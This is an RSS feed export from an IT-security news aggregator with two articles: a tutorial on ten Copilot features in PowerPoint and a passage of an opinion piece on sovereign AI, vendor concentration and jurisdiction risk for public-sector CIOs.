<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=hospitals+switching+cloudbased+hmis%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 19:45:16 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 19:45:16 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=hospitals+switching+cloudbased+hmis%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=hospitals+switching+cloudbased+hmis%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[10 cool things Copilot can do in PowerPoint]]></title>
<description><![CDATA[Building a presentation can take lots of time. There are design choices to figure out: the slide layouts, fonts, theme colors, and so on. You can use a template to skip this hassle, but you still have to paste your text and other content into the slides and edit it all so that the results are vis...]]></description>
<link>https://tsecurity.de/de/3694773/ai-nachrichten/10-cool-things-copilot-can-do-in-powerpoint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694773/ai-nachrichten/10-cool-things-copilot-can-do-in-powerpoint/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:10 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Building a presentation can take lots of time. There are design choices to figure out: the slide layouts, fonts, theme colors, and so on. You can use a template to skip this hassle, but you still have to paste your text and other content into the slides and edit it all so that the results are visually appealing.</p>



<p class="wp-block-paragraph">In PowerPoint, Microsoft’s Copilot AI assistant can now automate the heavy lifting of presentation creation. It can generate a first-draft presentation in minutes, then help you edit it. You can also prompt Copilot to help you quickly understand the contents of a presentation and glean insights from it. Use the tips in this guide to save oodles of time as you create and work with presentations.</p>



<h3 class="wp-block-heading">Who can use Copilot in PowerPoint</h3>



<p class="wp-block-paragraph">Individuals with a <a href="https://www.microsoft.com/en-us/microsoft-365-copilot/pricing/individuals" target="_blank" rel="noreferrer noopener">Microsoft 365 Personal, Family, or Premium</a> subscription have access to Copilot from within PowerPoint and other Microsoft 365 apps. Users with a Premium plan have <a href="https://support.microsoft.com/en-US/Microsoft-365-Copilot/ai-credits-and-limits-for-microsoft-365-subscriptions" target="_blank" rel="noreferrer noopener">higher Copilot usage allowances</a> and access to advanced AI features.</p>



<p class="wp-block-paragraph">For business users, it’s more complicated. Organizations with more than 2,000 users must pay for <a href="https://www.computerworld.com/article/1629974/m365-copilot-microsofts-generative-ai-tool-explained.html">Microsoft 365 Copilot</a> licenses for their users in addition to their regular Microsoft 365 licenses. Users at organizations with fewer than 2,000 users can use Copilot within M365 apps even without the M365 Copilot add-on licenses, but there are <a href="https://support.microsoft.com/en-us/microsoft-365-copilot/how-copilot-chat-works-with-and-without-a-microsoft-365-copilot-license" target="_blank" rel="noreferrer noopener">limitations</a> in usage, speed, and feature availability.</p>



<p class="wp-block-paragraph">To see what kind of access you have, log in to Microsoft’s <a href="https://m365.cloud.microsoft/" target="_blank" rel="noreferrer noopener">Copilot Chat web hub</a> and look for your name in the lower left corner. If you see “M365 Copilot (Premium)” under your name, you can use Copilot in M365 apps with priority access and advanced features. “M365 Copilot (Basic)” means you can use Copilot in M365 apps with lower-priority access and limited features. If you see “Copilot Chat (Basic)” or nothing below your name, you can’t use Copilot in M365 apps.</p>



<p class="wp-block-paragraph"><em>(Copilot Chat Basic users do get some Copilot functionality, including the ability to generate presentations, via the Copilot Chat hub. See our <a href="https://www.computerworld.com/article/4171293/copilot-chat-your-hub-for-document-creation-and-analysis.html">Copilot Chat tutorial</a> for details.)</em></p>



<h4 class="wp-block-heading"><strong>In this article:</strong></h4>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#sidebar">Working with Copilot in PowerPoint</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#template">Create a presentation template</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#pres-from-doc">Create a presentation from a document</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#slide-from-doc">Add content from a document to a slide</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#refine-text">Refine your slide text</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#image">Find or create an image</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#expand">Expand your presentation with relevant slides</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#summarize">Summarize a presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#answer-questions">Answer questions about a presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#navigate">Help you navigate a large presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#speaker-notes">Generate speaker notes and/or an FAQ</a></li>
</ul>



<h2 class="wp-block-heading">Working with Copilot in PowerPoint</h2>



<p class="wp-block-paragraph">First, let’s quickly go over the notable settings of the Copilot sidebar.</p>



<p class="wp-block-paragraph">When you have a presentation open in PowerPoint, click the Copilot icon; it may be floating at the lower-right corner of your PowerPoint window or parked at the right end of the Ribbon toolbar. The Copilot sidebar will open along the right of the page. You’ll type your prompts to Copilot inside the chat window in this pane.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-01-sidebar.png?w=1024" alt="powerpoint screen with copilot sidebar open on right" class="wp-image-4195065" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>The sidebar on the right is where you interact with Copilot in PowerPOint.</p><br></figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph"><strong>Agent mode:</strong> By default, Copilot can build a new presentation or make changes to an existing one in the main PowerPoint window. This is known as “agent mode.” To change this so that Copilot can’t take direct action on a presentation (all its responses appear in the sidebar), click the <em>Allow editing</em> button above the chat window and change it to <em>Chat only</em>.</p>



<p class="wp-block-paragraph">The tips in this guide require that Copilot be in agent mode, so make sure you see <em>Allow editing</em> above the chat window.</p>



<p class="wp-block-paragraph"><strong>Choice of AI model:</strong> Behind the scenes, Copilot has access to various genAI models, including different versions of Anthropic Claude and OpenAI GPT.  By default, it decides which model to use based on your prompt. You can set it to use a particular model: click <em>Auto</em> at the upper right of the Copilot pane and select a model from the dropdown that opens.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-02-sidebar-model-dropdown.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with models dropdown menu open" class="wp-image-4195063" width="1024" height="697" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>You can choose which AI model you want Copilot to use for a request.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">The tips in this guide should work fine on the default <em>Auto</em> setting. But feel free to experiment switching to specific models to see which give you the best results for particular tasks.</p>



<p class="wp-block-paragraph"><strong>Important:</strong> Remember that <a href="https://www.computerworld.com/article/4059383/openai-admits-ai-hallucinations-are-mathematically-inevitable-not-just-engineering-flaws.html">generative AI output often includes errors</a>, so always check Copilot’s output for accuracy. (Also see our <a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">tips for reducing hallucinations in Copilot</a>.) You’ll likely want to rewrite it in your own voice as you’re reviewing it.</p>



<h2 class="wp-block-heading"><a></a>1. Create a presentation template</h2>



<p class="wp-block-paragraph">For many people, the hardest part of creating a presentation is getting started. What types of information should be included on the slides, and in what order? Copilot can give you a leg up by creating the type of presentation you need, with placeholder data that you can later replace with your own.</p>



<p class="wp-block-paragraph">Start a new presentation, open the Copilot sidebar, and type your prompt into the chat window. It’s best to provide very specific details in your prompt. The more context or details you provide, the more likely Copilot will generate a presentation template that suits your needs.</p>



<p class="wp-block-paragraph">A good prompt should contain the slide count, subject, audience, and tone. Example:</p>



<ul class="wp-block-list">
<li><em>Create a 6-slide presentation for a sales meeting focusing on Q1 revenue. The audience is the sales team, so keep the tone professional and focused on the sales data.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot may ask a series of follow-up questions, such as your preferred visual style and desired level of detail. Then it will generate a presentation template.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-03-generated-presentation-with-placeholder-data.png?w=1024" alt="screenshot of powerpoint presentation generated by copilot with placeholder data" class="wp-image-4195064" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot generates a presentation with placeholder data and explains its elements.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">You can optionally prompt Copilot for revisions, and when you’re happy with the template, swap in your own data.</p>



<h2 class="wp-block-heading"><a></a>2. Create a presentation from a document</h2>



<p class="wp-block-paragraph">You can attach a document (such as a Word document, Excel spreadsheet, or PDF) and prompt Copilot to generate a presentation based on its contents. This works best with a structured-format document (such as a business plan, project proposal, or summary report) that contains sections with headings.</p>



<p class="wp-block-paragraph">Copilot can extract the document’s text and structure to generate the slide content for the new presentation. This can especially be useful for quickly turning a long report into a visually appealing presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, click the <em>+</em> icon at the bottom of the chat window. A list of documents that you’ve recently accessed appears. Select the one that you want Copilot to use. Alternatively, click the magnifying glass icon and inside its search box, type a few letters of the filename for the document you want. (Business users with an M365 Copilot license can select up to five files for Copilot to pull from when creating a presentation.)</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-04-attach-document.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with a document being attached for copilot to base a presentation on" class="wp-image-4195062" width="1024" height="733" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Attaching a document for Copilot to base a presentation on.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Then in the chat window, you can enter a prompt that’s as simple as “<em>Create a presentation</em>,” although as always, providing more details and context is better. This is especially important for corporate users who reference multiple source files. It’s useful to tell Copilot what data to pull from each document.</p>



<p class="wp-block-paragraph">Answer any follow-up questions that Copilot asks, and it will then generate the presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-05-generated-presentation-from-doc.png?w=1024" alt="screenshot of powerpoint with a presentation generated by copilot from a document" class="wp-image-4195067" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot has generated a professional presentation from a social media marketing campaign document.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Note: Your marketing department may have created one or more <a href="https://support.microsoft.com/en-US/PowerPoint/copilot/keep-your-presentation-on-brand-with-copilot" target="_blank" rel="noreferrer noopener">branded company templates for Copilot to work from</a>. If that’s the case at your organization, simply open the appropriate company template as your first step. Then you can upload docs and type a prompt as described above. Copilot will create a presentation using the branded template.</p>



<h2 class="wp-block-heading"><a></a>3. Add content from a document to a slide</h2>



<p class="wp-block-paragraph">Manually copying text or other content from a document and pasting it into a new slide is a chore. Instead, you can prompt Copilot to extract information directly from a Word document, Excel spreadsheet, or PDF to create new slides.</p>



<p class="wp-block-paragraph">In the Copilot pane, attach the document using the same steps described in tip 2, then tell Copilot to create a slide from the document. As always, it helps to provide details such as the new slide’s focus or what data to include:</p>



<ul class="wp-block-list">
<li><em>Add a slide based on the attached document.</em></li>



<li><em>Use the attached file to add a slide about the project budget that focuses on Q1 projections.</em></li>



<li><em>Summarize only the financial section of the attached document as a slide.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-06-generated-slide-from-spreadsheet.png?w=1024" alt="screenshot of a slide in powerpoint generated by copilot from spreadsheet data" class="wp-image-4195068" width="1024" height="612" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>A new Copilot-generated slide based on data from an Excel spreadsheet.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a><a></a>4. Refine your slide text</h2>



<p class="wp-block-paragraph">A presentation should be visual and display only the core message. Conciseness and proper writing tone are essential for your slides, so that they don’t lose the attention of your audience.</p>



<p class="wp-block-paragraph">You can prompt Copilot to refine text on an individual slide in various ways, such as rewriting it in a more professional tone or making it more concise. Highlight the text inside a text box on the slide. On the toolbar that appears over the highlighted text, click <em>Edit with Copilot</em>.</p>



<p class="wp-block-paragraph">On the menu that opens, you can select a preset prompt to refine the text, such as <em>Condense</em> or <em>Make professional</em>. Or, at the top of this menu, you can type a prompt to rewrite the highlighted text.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-07-refine-slide-text-options-menu.png" alt="screenshot of text on a powerpoint slide with copilot dropdown menu includng condense and make professional options" class="wp-image-4195066" width="960" height="690" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="wp-element-caption"><p>Choose a preset prompt for refining text on a slide or type in your own prompt.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Note that this feature affects all the text inside the text box. To rewrite only a portion of text inside a text box, you must split that portion out into a separate text box.</p>



<p class="wp-block-paragraph">Alternatively, you can prompt Copilot to analyze your entire presentation and tighten up the wording throughout all of its slides. For example:</p>



<ul class="wp-block-list">
<li><em>Make these slides more visual and use less text.</em></li>
</ul>



<h2 class="wp-block-heading">5. Find or create an image</h2>



<p class="wp-block-paragraph">If you have Copilot generate a presentation from an existing Word document that contains images, it will incorporate those images into the presentation. If there are no images in the source document, you can ask Copilot to find or create one and add it to a slide.</p>



<p class="wp-block-paragraph">To add a stock image or an image from your organization’s brand library, tell Copilot what you’re looking for:</p>



<ul class="wp-block-list">
<li><em>Add a stock photo of young adults in a cafe drinking boba tea.</em></li>



<li><em>Add a photo from our asset library of young adults in a cafe drinking boba tea.</em></li>
</ul>



<p class="wp-block-paragraph">To have Copilot create an image using Microsoft’s Designer image generation tool, describe your desired image. As always, specificity is helpful:</p>



<ul class="wp-block-list">
<li><em>Create a photorealistic image of a diverse group of 5 or 6 fashionable young adults sitting in a cafe drinking boba tea. They’re smiling or laughing, and some are looking at their phones.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-08-generate-image.png?w=1024" alt="screenshot of image generation prompt in copilot sidebar in powerpoint plus the resulting generated image on a slide" class="wp-image-4195097" width="1024" height="594" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot in PowerPoint hooks into Microsoft’s Designer tool for image generation.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Just as you need to review any text output from Copilot, take a close look at generated images to be sure nothing looks off. </p>



<p class="wp-block-paragraph">Also note that Copilot image generation isn’t always reliable in PowerPoint. For some time during our testing for this story, Copilot said it couldn’t create an image because “the image generation service is returning a server error on every attempt.” After about a day and a half, the service began working again.</p>



<h2 class="wp-block-heading"><a></a>6. Expand your presentation with relevant slides</h2>



<p class="wp-block-paragraph">As you’re building your presentation, you may find that it’s become text heavy. Or perhaps it could use more visually oriented slides to break things up and make its progression flow better. Copilot can generate and insert new slides that are based on the content of the slides already in the presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, specify exactly where you want the new slide to go. This helps Copilot to analyze the content of the slides before and after where you want the new slide. Then it can generate a slide to bridge between the two slides. Examples:</p>



<ul class="wp-block-list">
<li><em>Add a slide after slide 3 about our competitive advantages.</em></li>



<li><em>Add a slide after slide 11 that transitions to slide 12.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-09-generated-transition-slide.png?w=1024" alt="screenshot of powerpoint screen with copilot sidebar and a transition slide generated by copilot" class="wp-image-4195094" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Need a transition slide? Just ask!</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading">7. Summarize a presentation</h2>



<p class="wp-block-paragraph">Maybe you need a quick refresh of your presentation before an important meeting. Or maybe a co-worker has sent you a presentation that’s packed with lots of slides. You can prompt Copilot to generate a summary of the presentation’s overall messaging.</p>



<p class="wp-block-paragraph">In the Copilot pane, just type “<em>summarize this presentation</em>.” You can also have Copilot flag key slides that contain important information: “<em>show me key slides</em>.”</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-10-summarize-key-slides.png?w=1024" alt="screenshots of copilot sidebar in powerpoint - one with summarize results and one with key slides response" class="wp-image-4195095" width="1024" height="774" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ask Copilot to summarize a presentation or flag key slides.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a>8. Answer questions about a presentation</h2>



<p class="wp-block-paragraph">As you’re reviewing a presentation, especially one that you didn’t create and are not familiar with, you can get Copilot to pull key data points from its slides.</p>



<p class="wp-block-paragraph">In the Copilot pane, type specific informational questions. Examples:</p>



<ul class="wp-block-list">
<li><em>What are the action items in this deck?</em></li>



<li><em>What is the proposed budget mentioned here?</em></li>
</ul>



<p class="wp-block-paragraph">If Copilot can’t find the exact answer to the question you ask, it will provide related information from the presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-11-ask-questions-about-presentation.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with response to query about proposed budget in the slide deck" class="wp-image-4195093" width="1024" height="760" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ask Copilot specific questions about the contents of a presentation.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">This method can also help you validate that your presentation includes everything you want it to. If you ask Copilot about the action items in a presentation and it can’t find any, you know you need to add them. (Copilot will likely offer to generate them for you based on the rest of the slides.)</p>



<p class="wp-block-paragraph">You can even take this tactic a step further and ask Copilot if the presentation is missing any important data, if any slides are weak or confusing, if there are any awkward transitions, if there are key points that should be better emphasized, and so on.</p>



<h2 class="wp-block-heading"><a></a>9. Help you navigate a large presentation</h2>



<p class="wp-block-paragraph">In the business world, presentations with dozens of slides are not uncommon, such as for financial reports or project documentation. Trying to find a specific slide or multiple slides can be tough. Copilot can help you navigate such a presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, prompt Copilot to find slides based on specific topics. Example:</p>



<ul class="wp-block-list">
<li><em>Show me the slides about the project timeline.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot will analyze the presentation and reply with a list of links to the relevant slides. Click one of these to jump directly to that slide.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-12-navigate-presentation.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with response about the slide that talks about target audience" class="wp-image-4195096" width="1024" height="760" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot can help you zoom directly to a slide that covers a particular topic or shows specific data.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a>10. Generate speaker notes and/or an FAQ</h2>



<p class="wp-block-paragraph">Here’s a great timesaver when you’re preparing to show your presentation to an audience: Copilot can automatically generate suggested speaker notes for you, based on the content of your slides. Example prompt:</p>



<ul class="wp-block-list">
<li><em>Write speaker notes for every slide with one talking point per slide.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-13-speaker-notes.png?w=1024" alt="screenshot of powerpoint presentation with speaker notes generated by copilot" class="wp-image-4195092" width="1024" height="607" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot can create speaker notes in seconds.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">In a related feature, Copilot can create a frequently asked questions list (FAQ) for you to consult in your speaker notes or to present as a slide:</p>



<ul class="wp-block-list">
<li><em>Write an FAQ for these slides.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot will ask where you want the questions and answers added — as a new slide at the end, integrated into the speaker notes of relevant slides, or somewhere else that you designate. Make a selection, and Copilot will generate the FAQ based on the content of your presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-14-generated-faq-slide.png?w=1024" alt="screenshot of frequently asked questions slide generated by copilot in powerpoint" class="wp-image-4195091" width="1024" height="609" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>A Copilot-generated FAQ slide.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h4 class="wp-block-heading"><strong>Related reading:</strong></h4>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4119411/11-cool-things-copilot-can-do-in-excel.html">11 cool things Copilot can do in Excel</a></li>



<li><a href="https://www.computerworld.com/article/4022584/9-ways-copilot-can-turbocharge-onenote.html">9 ways Copilot can turbocharge OneNote</a></li>



<li><a href="https://www.computerworld.com/article/1647230/powerpoint-for-microsoft-365-cheat-sheet.html">PowerPoint for Microsoft 365 cheat sheet</a></li>



<li><a href="https://www.computerworld.com/article/4171293/copilot-chat-your-hub-for-document-creation-and-analysis.html">Copilot Chat: Your hub for document creation and analysis</a></li>



<li><a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">How to curb hallucinations in Copilot (and other genAI tools)</a></li>



<li><a href="https://www.computerworld.com/article/3479705/how-to-use-microsoft-copilot-for-writing-in-microsoft-365-word-outlook-onenote.html">Microsoft Copilot can boost your writing in Word, Outlook, and OneNote — here’s how</a></li>



<li><a href="https://www.computerworld.com/article/1682358/microsoft-cheat-sheets-dive-into-windows-and-office-apps.html">More Microsoft tips and tutorials</a></li>
</ul>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sovereign AI has become the public-sector CIO’s control problem]]></title>
<description><![CDATA[In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving in...]]></description>
<link>https://tsecurity.de/de/3694400/it-security-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694400/it-security-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</guid>
<pubDate>Sat, 25 Jul 2026 18:57:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving into AI, and most sovereign-AI debates answer the wrong version of it.</p>



<p class="wp-block-paragraph">They ask whether a country can build its own model on domestic data and hardware. For the United States and China, which together hold more than 90% of global AI data-center capacity, per a <a href="https://institute.global/insights/tech-and-digitalisation/sovereignty-in-the-age-of-ai-strategic-choices-structural-dependencies">January 2026 Tony Blair Institute analysis</a>, that question is worth asking. However, for almost every other government, it is the wrong place to start. The operative question is narrower: Once AI is embedded in public services, who controls the stack?</p>



<h2 class="wp-block-heading">The 5 layers of public-sector control</h2>



<p class="wp-block-paragraph">For a CIO, sovereign AI means enforceable control across the AI lifecycle; model ownership is a separate question. Control has five layers:</p>



<ul class="wp-block-list">
<li><strong>Data control:</strong> Where sensitive public data sits, and whether it can train a vendor’s model.</li>



<li><strong>Model control:</strong> Which models clear which workloads, and under what validation.</li>



<li><strong>Infrastructure control:</strong> Whether critical workloads run in approved environments.</li>



<li><strong>Operational control:</strong> Whether AI-assisted actions are logged, monitored and reversible.</li>



<li><strong>Vendor control:</strong> Whether the agency keeps portability, audit rights and a real exit.</li>
</ul>



<p class="wp-block-paragraph">Those five layers are the control plane for public-service AI. Floyd Dcosta recently made the enterprise case in “<a href="https://www.cio.com/article/4147102/ai-without-sovereignty-is-just-outsourced-intelligence.html">AI without sovereignty is just outsourced intelligence</a>”: capability is what a tool can do; authority over how and when it does it is something a buyer can quietly lose. For public services, losing that authority plays out in the public eye.</p>



<p class="wp-block-paragraph">Public-sector AI risk differs from enterprise risk. A retailer’s bad recommendation costs a sale; a government’s AI touches benefits, tax enforcement, policing and emergency response, raising the bar to due process, records retention and continuity of operations. A government that cannot reconstruct an AI-assisted decision lacks operational sovereignty, even in a domestic data center.</p>



<h2 class="wp-block-heading">Evaluating risk: Concentration, jurisdiction and shadow AI</h2>



<p class="wp-block-paragraph">Foreign dependency is a real risk, but the exposure that matters is a sudden cutoff: A model you cannot audit, switch or exit, shut off by someone else’s order. A vendor’s nationality is a poor guide to that risk; control is.  Two markers matter. The first is concentration. In July 2024, a single faulty CrowdStrike update <a href="https://www.cisa.gov/news-events/alerts/2024/07/19/widespread-it-outage-due-crowdstrike-update">crashed about 8.5 million Windows machines</a>, disrupting airlines, hospitals, banks and governments worldwide. No attacker was involved; one homogeneous dependency failed everywhere at once. The lesson points away from vendor nationality and toward uniformity as the fault line, making portability and provider diversity resilience controls.</p>



<p class="wp-block-paragraph">The second is jurisdiction. In June 2025, Microsoft’s legal director for France <a href="https://www.sdxcentral.com/news/microsoft-tells-french-lawmakers-it-cant-protect-user-data-from-us-demands/">told a Senate inquiry, under oath</a>, that it could not guarantee that French public-sector data, even in French data centers, would be protected against US demands under the 2018 CLOUD Act. No such request had been made, and EU data has stayed in the EU since January 2025; senators called the assurance purely declarative. For the most sensitive data, residency does not equal control; the parent’s jurisdiction can matter as much as the server’s. Three US hyperscalers hold <a href="https://www.srgresearch.com/articles/european-cloud-providers-local-market-share-now-holds-steady-at-15">about 70% of the European cloud market</a>, while European providers’ share fell from 29% in 2017 to roughly 15%. Concentration plus jurisdiction is the exposure a CIO must price. I have watched teams treat vendor selection as the moment risk was solved; it rarely was.</p>



